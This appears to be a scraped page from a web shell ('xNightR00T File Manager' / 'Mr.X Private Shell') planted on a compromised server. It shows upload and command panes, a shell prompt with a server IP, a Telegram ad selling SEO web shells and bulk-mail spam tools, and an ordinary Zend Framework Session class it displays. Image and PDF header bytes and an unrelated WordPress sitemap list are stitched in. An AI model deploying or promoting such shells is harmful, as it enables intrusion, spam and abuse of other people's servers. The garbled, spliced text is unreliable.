xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace Application;

use Zend\Session\Container;
use Zend\Stdlib\ArrayObject;


/**
 * Session class
 *
 */
class Session
{
    /**
     * Data of array
     * @var array
     */
    protected $data = array();

    /**
     * Session Container
     * @var Container
     */
    protected $container;

    function __construct($sessionName = 'defualt')
    {
        $this->container = new Container($sessionName);
    }

    /**
     * Magic method that create dynamic method
     * @param string $methodName
     * @param mixed $params
     * @return boolean
     * @throws Exception
     */
    public function __call($methodName, $params = null)
    {
        $pieces = preg_split('/(?=[A-Z])/', $methodName);
        if (isset($pieces[0])) {
            $methodPrefix = substr($pieces[0], 0, 3);
            unset($pieces[0]);
        } else {
            return false;
        }
        $key = strtolower(implode("_", $pieces));


        if ($methodPrefix == 'set') {

            if (isset($params[0]) || (count($params) > 0 && key($params) == 0)) {
                $params = $params[0];
            }

            if (is_array($params) && empty($params)) {
                $params = null;
            }
            return $this->set($key, $params);
        } elseif ($methodPrefix == 'get') {
            if (isset($params[0]) || (count($params) > 0 && key($params) == 0)) {
                $params = $params[0];
            }
            if (is_array($params) && empty($params)) {
                $params = null;
            }
            return $this->get($key, $params);
        } elseif ($methodPrefix == 'remove') {
            if (isset($params[0]) || (count($params) > 0 && key($params) == 0)) {
                $params = $params[0];
            }
            if (is_array($params) && empty($params)) {
                $params = null;
            }
            return $this->remove($key);
        } else {
            throw new Exception('Opps! The method is not defined!');
        }
    }

    /**
     * Get value from data by key
     * @param string $key
     * @param $default value
     * @return boolean
     */
    public function get(string $key, $default = null)
    {

        if (isset($this->container->$key)) {
            return $this->container->$key;
        } else if (!is_null($default)) {
            return $default;
        } else {
            return false;
        }
    }

    /**
     * Set value by key
     * @param string $key
     * @param mixed $val
     * @return $this
     */
    public function set(string $key, $val)
    {
        $this->container->$key = $val;
        return $this;
    }

    /**
     * Megic method
     * @param string $key
     * @param mixed $val
     * @return $this
     */
    public function __set(string $key, $val)
    {
        return $this->set($key, $val);
    }

    /**
     * Megic method
     * @param string $key
     * @return mixed
     */
    public function __get(string $key)
    {
        return $this->get($key);
    }

    /**
     * Get array copy of session
     * @return array
     */
    public function getData()
    {
        return $this->container->getArrayCopy();
    }

    /**
     * Get array copy of session
     * @return array
     */
    public function setData(array $data)
    {
        return $this->container->exchangeArray($data);
    }
}

Filemanager

Name Type Size Permission Actions
Controller Folder 0755
Db Folder 0755
Exception Folder 0755
Forms Folder 0755
Model Folder 0755
Validation Folder 0755
Validators Folder 0755
View Folder 0755
ConfigAwareInterface.php File 255 B 0644
Element.php File 16.6 KB 0644
HomeSwitchRoute.php File 705 B 0644
Session.php File 3.29 KB 0644
SessionStorage.php File 4.51 KB 0644
ZendDataCacheSessionHandler.php File 2.94 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml